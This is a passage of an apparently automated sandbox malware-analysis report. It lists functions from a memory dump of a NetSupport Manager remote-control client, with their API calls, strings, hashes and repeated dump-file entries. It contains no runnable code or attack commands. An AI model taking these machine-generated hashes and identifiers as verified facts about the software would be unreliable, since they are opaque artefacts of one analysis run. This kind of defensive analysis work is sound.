                                                                                    • Opcode Fuzzy Hash: b8f593f3550aa9e0f779f3b8c62ca3ee8f9d3103c1fcafdad78b4b8c3047e15f
                                                                                    • Instruction Fuzzy Hash: D69128B5E002599FDB54DFA8CCC4ADDF7B9FB88314F608169E519AB280EB70A941CB50
                                                                                    Function 1102B1D0 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 220COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    • GetLastError.KERNEL32(?), ref: 1102B331
                                                                                    • GetLastError.KERNEL32(?), ref: 1102B38E
                                                                                    • _fgets.LIBCMT ref: 1102B3C0
                                                                                    • _strtok.LIBCMT ref: 1102B3E8
                                                                                      • Part of subcall function 11163016: __getptd.LIBCMT ref: 11163034
                                                                                    • _fgets.LIBCMT ref: 1102B424
                                                                                    • _strtok.LIBCMT ref: 1102B438
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$_fgets_strtok$ExitMessageProcess__getptdwsprintf
                                                                                    • String ID: *LookupFile$IsA()$LookupFileUser$WARN: Could not open TS lookup file: "%s" (%d), user="%s"$WARN: LoginUser failed (%d) user="%s"$WARN: No TS lookup file specified!$WARN: clientname is empty!$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                    • API String ID: 78526175-1484737611
                                                                                    • Opcode ID: ff60ef9c488c2c79b08b3262712ada230bbec0adfdbeaabbc1cb1cc15ddf1ff7
                                                                                    • Instruction ID: 83a04ffa2f5f23a923324f4189043cfd8b751997b231b4d3af7dc0cd534076c2
                                                                                    • Opcode Fuzzy Hash: ff60ef9c488c2c79b08b3262712ada230bbec0adfdbeaabbc1cb1cc15ddf1ff7
                                                                                    • Instruction Fuzzy Hash: 2E81B675D00A1E9BDB10DBA4CC80FEEB7B9AF44309F4440D8E919A7245EA75AB84CF91
                                                                                    Function 11031160 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 245sleepwindowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104,420B7E12,00000000,00000000,00000000), ref: 1103119A
                                                                                      • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                    • EnumWindows.USER32(110301B0,00000001), ref: 11031272
                                                                                    • EnumWindows.USER32(110301B0,00000000), ref: 110312CC
                                                                                    • Sleep.KERNEL32(00000014,?,?,?,?,?,00000000), ref: 110312DC
                                                                                    • Sleep.KERNEL32(?,?,?,?,?,?,00000000), ref: 11031313
                                                                                      • Part of subcall function 11027E50: _memset.LIBCMT ref: 11027E85
                                                                                      • Part of subcall function 11027E50: wsprintfA.USER32 ref: 11027EBA
                                                                                      • Part of subcall function 11027E50: WaitForSingleObject.KERNEL32(?,000000FF), ref: 11027EFF
                                                                                      • Part of subcall function 11027E50: GetExitCodeProcess.KERNEL32(?,?), ref: 11027F13
                                                                                      • Part of subcall function 11027E50: CloseHandle.KERNEL32(?,00000000), ref: 11027F45
                                                                                      • Part of subcall function 11027E50: CloseHandle.KERNEL32(?), ref: 11027F4E
                                                                                    • Sleep.KERNEL32(0000000A,?,?,?,?,?,00000000), ref: 1103132B
                                                                                    • SendMessageA.USER32(?,00000010,00000000,00000000), ref: 110313E7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: SleepWindows$CloseEnumHandle$CodeDirectoryExitMessageObjectProcessSendSingleWait__wcstoi64_memsetwsprintf
                                                                                    • String ID: "%sNSMExec.exe" %s$*ExitMetroDelay$Client$No new explorer wnd$\Explorer.exe$close new explorer wnd x%x
                                                                                    • API String ID: 3887438110-1852639040
                                                                                    • Opcode ID: dd4de2a7fc9d8cd5af608a89b0c8565785138ad2200bde7dfaaacefb5c936fd0
                                                                                    • Instruction ID: 68f8b224c7beedd47666692ff363fa6bc3684c9dbb57027410f782db2506f70a
                                                                                    • Opcode Fuzzy Hash: dd4de2a7fc9d8cd5af608a89b0c8565785138ad2200bde7dfaaacefb5c936fd0
                                                                                    • Instruction Fuzzy Hash: 3391D0B5E002299FDB14CF64DC80BEEF7F5AF89308F1441A9D9599B640EB30AE45CB91
                                                                                    Function 110B3520 Relevance: 23.0, APIs: 3, Strings: 10, Instructions: 228COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                    • EnterCriticalSection.KERNEL32(?,View,limitcolorbits,00000000,00000000,420B7E12,111F00F8,111E5C98,?), ref: 110B3594
                                                                                    • UnionRect.USER32(?,?,?), ref: 110B3642
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 110B37DD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterLeaveRectUnion__wcstoi64
                                                                                    • String ID: 8$Client$ScrapeBandwidth$ScrapeBandwidthPeriod$ScrapeBusyDelay$ScrapeNotBusyDelay$ScrapeSkipDelay$View$d$limitcolorbits
                                                                                    • API String ID: 3518726166-774679399
                                                                                    • Opcode ID: 0507bcf6a5bfb235a752924e3a90bf095b586a4feb6a764fbd151a6487f36d15
                                                                                    • Instruction ID: 5c973c881439576bbc97280a0c87cfab299b34d5c0027cf4f030de1918296fe0
                                                                                    • Opcode Fuzzy Hash: 0507bcf6a5bfb235a752924e3a90bf095b586a4feb6a764fbd151a6487f36d15
                                                                                    • Instruction Fuzzy Hash: E5911778E04219AFDB54CFA5C980BADFBF1FB48704F20816AE815AB380D735A941CF58
                                                                                    Function 1102310A Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 363windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 1115ADD0: IsIconic.USER32(?), ref: 1115AE77
                                                                                      • Part of subcall function 1115ADD0: ShowWindow.USER32(?,00000009), ref: 1115AE87
                                                                                      • Part of subcall function 1115ADD0: BringWindowToTop.USER32(?), ref: 1115AE91
                                                                                    • CheckMenuItem.USER32(00000000,000013EB,-00000009), ref: 1102324D
                                                                                    • ShowWindow.USER32(?,00000003), ref: 110232D1
                                                                                    • LoadMenuA.USER32(00000000,000013A3), ref: 110233FB
                                                                                    • GetSubMenu.USER32(00000000,00000000), ref: 11023409
                                                                                    • CheckMenuItem.USER32(00000000,000013EB,?), ref: 11023429
                                                                                    • GetDlgItem.USER32(?,000013B2), ref: 1102343C
                                                                                    • GetWindowRect.USER32(00000000), ref: 11023443
                                                                                    • PostMessageA.USER32(?,00000111,?,00000000), ref: 11023499
                                                                                    • DestroyMenu.USER32(?,?,00000000,00000000,00000102,?,?,?,00000000), ref: 110234A3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Menu$Window$Item$CheckShow$BringDestroyIconicLoadMessagePostRect
                                                                                    • String ID: AddToJournal$Chat
                                                                                    • API String ID: 693070851-2976406578
                                                                                    • Opcode ID: d2fe2766ddb3d34030bb972f012e30f748b4f8edd59272365cd546290ab4e6ab
                                                                                    • Instruction ID: 337dba7d0f02a97e7c7211def3ec221287211942730252afe18814347e7ecccc
                                                                                    • Opcode Fuzzy Hash: d2fe2766ddb3d34030bb972f012e30f748b4f8edd59272365cd546290ab4e6ab
                                                                                    • Instruction Fuzzy Hash: 87A1F178B04616ABDB09DF74CC85FAEB3E5AB88704F504519EA26DF2C0CF74B9408B65
                                                                                    Function 11027270 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 136threadwindowsleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 11089280: UnhookWindowsHookEx.USER32(?), ref: 110892A3
                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 110272B4
                                                                                      • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                      • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                      • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000001F4), ref: 11027323
                                                                                    • PostMessageA.USER32(00030462,00000501,00000000,00000000), ref: 11027340
                                                                                    • SetEvent.KERNEL32(00000294), ref: 11027351
                                                                                    • Sleep.KERNEL32(00000032), ref: 11027359
                                                                                    • PostMessageA.USER32(00030462,00000800,00000000,00000000), ref: 1102738E
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 110273BA
                                                                                    • GetThreadDesktop.USER32(00000000), ref: 110273C1
                                                                                    • SetThreadDesktop.USER32(00000000), ref: 110273CA
                                                                                    • CloseDesktop.USER32(00000000), ref: 110273D5
                                                                                    • CloseHandle.KERNEL32(000003C8), ref: 11027415
                                                                                      • Part of subcall function 111100D0: GetCurrentThreadId.KERNEL32 ref: 11110166
                                                                                      • Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(-00000010,?,11031040,00000001,00000000), ref: 11110179
                                                                                      • Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(111F08F0,?,11031040,00000001,00000000), ref: 11110188
                                                                                      • Part of subcall function 111100D0: EnterCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111019C
                                                                                      • Part of subcall function 111100D0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031040), ref: 111101C2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Thread$CriticalDesktopEventSection$CloseCreateCurrentInitializeMessagePost$EnterHandleHookMultipleObjectsSleepUnhookWaitWindows_malloc_memsetwsprintf
                                                                                    • String ID: Async
                                                                                    • API String ID: 3276504616-2933828738
                                                                                    • Opcode ID: 7f34267c0eb402a5cecabe7481cb594ff7fa9432527a27f32e6b0a7f9cc990e4
                                                                                    • Instruction ID: b4c20aaf8d895fc577ef80b9cbd2db14a62b6b62bbca8aebe14e383436c97cb7
                                                                                    • Opcode Fuzzy Hash: 7f34267c0eb402a5cecabe7481cb594ff7fa9432527a27f32e6b0a7f9cc990e4
                                                                                    • Instruction Fuzzy Hash: 2641A174A056159FEB05DFF8C886BAEB7A4FB54718F804138E925DB6C4EB70B800CB51
                                                                                    Function 11105340 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 84fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 1110534D
                                                                                    • EnterCriticalSection.KERNEL32(111F060C,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 11105356
                                                                                    • GetTickCount.KERNEL32 ref: 1110535C
                                                                                    • GetTickCount.KERNEL32 ref: 1110538E
                                                                                    • LeaveCriticalSection.KERNEL32(111F060C,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 11105397
                                                                                    • EnterCriticalSection.KERNEL32(?,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 111053B8
                                                                                    • WriteFile.KERNEL32(00000000,1118C583,?,?,00000000,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF), ref: 111053D0
                                                                                    • LeaveCriticalSection.KERNEL32(?,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 111053DD
                                                                                    • GetTickCount.KERNEL32 ref: 111053EC
                                                                                    • LeaveCriticalSection.KERNEL32(111F060C,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 111053F5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$CountTick$Leave$Enter$FileWrite
                                                                                    • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
                                                                                    • API String ID: 831250470-625438208
                                                                                    • Opcode ID: 7549535bd9f32612e90d0c37b89a6aa1a9d576740b26f55eee6ebfb36c9c683f
                                                                                    • Instruction ID: 510883743b079e8f18b7a04972f4ca77f6f871929db96d85a9feff413df15827
                                                                                    • Opcode Fuzzy Hash: 7549535bd9f32612e90d0c37b89a6aa1a9d576740b26f55eee6ebfb36c9c683f
                                                                                    • Instruction Fuzzy Hash: F521F37AE10228ABDB009F759CC89AEFBADEB8972DB551075FC15CB204D6609C04CBA0
                                                                                    Function 1100D200 Relevance: 19.6, APIs: 1, Strings: 12, Instructions: 50COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: wsprintf
                                                                                    • String ID: AlreadyStarted$AlreadyStopped$BadParam$CannotGetFunc$CannotLoadDll$DllInitFailed$Exception$NoCapClients$NotFound$RequiresVista$StillInstances$Unknown error %d
                                                                                    • API String ID: 2111968516-2092292787
                                                                                    • Opcode ID: 68bb8bbd715fdcfb00972525606c57017de8997db1f0824372bcab7740fe05b1
                                                                                    • Instruction ID: d9a7d6ebd96fccb3ef7d6a30ae0c52648c54e2eaa592bb8290d406d227b44d1e
                                                                                    • Opcode Fuzzy Hash: 68bb8bbd715fdcfb00972525606c57017de8997db1f0824372bcab7740fe05b1
                                                                                    • Instruction Fuzzy Hash: B7F0623269520C47BA8087EC784053EF78D739217D7C88093F4ACFAF20E916DCA0A1A9
                                                                                    Function 11137340 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetVersion.KERNEL32(00000000,74DF0BD0,00000000), ref: 11137363
                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 11137384
                                                                                    • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 11137394
                                                                                    • GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 111373B1
                                                                                    • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoA), ref: 111373BD
                                                                                    • _memset.LIBCMT ref: 111373D7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc$Version_memset
                                                                                    • String ID: KERNEL32.DLL$Terminal Server$VerSetConditionMask$VerifyVersionInfoA$ntdll.dll
                                                                                    • API String ID: 1659045089-3162170060
                                                                                    • Opcode ID: 2782e45080b00d7644363843fb4dac8f82773bfcd6b8b8724ba95a014df5fc97
                                                                                    • Instruction ID: 0c0b10a14524f440857339b23279ac9494b8b75ce88d62c7832b422cfd240681
                                                                                    • Opcode Fuzzy Hash: 2782e45080b00d7644363843fb4dac8f82773bfcd6b8b8724ba95a014df5fc97
                                                                                    • Instruction Fuzzy Hash: CB216A70F10329ABF720AB71AD44F5AFFA99B8871AF000474E914A7189EA71B9048765
                                                                                    Function 110390F0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 225COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetDlgItem.USER32(?,00000001), ref: 1103910C
                                                                                    • IsWindowEnabled.USER32(00000000), ref: 11039113
                                                                                    • _memset.LIBCMT ref: 11039131
                                                                                    • GetDlgItemTextA.USER32(?,0000044D,?,00000080), ref: 11039183
                                                                                    • GetDlgItemTextA.USER32(?,0000044F,00000000,00000080), ref: 110391EB
                                                                                    • GetDlgItemTextA.USER32(?,000004BE,00000000,00000080), ref: 1103924E
                                                                                    • GetDlgItemTextA.USER32(?,000017EC,00000000,00000080), ref: 110392B1
                                                                                    • GetDlgItemTextA.USER32(?,0000048E,00000000,00000080), ref: 11039377
                                                                                    • GetDlgItemTextA.USER32(?,0000048D,00000000,00000080), ref: 11039314
                                                                                      • Part of subcall function 11142800: _strncpy.LIBCMT ref: 11142824
                                                                                      • Part of subcall function 11142290: _strncpy.LIBCMT ref: 111422D2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
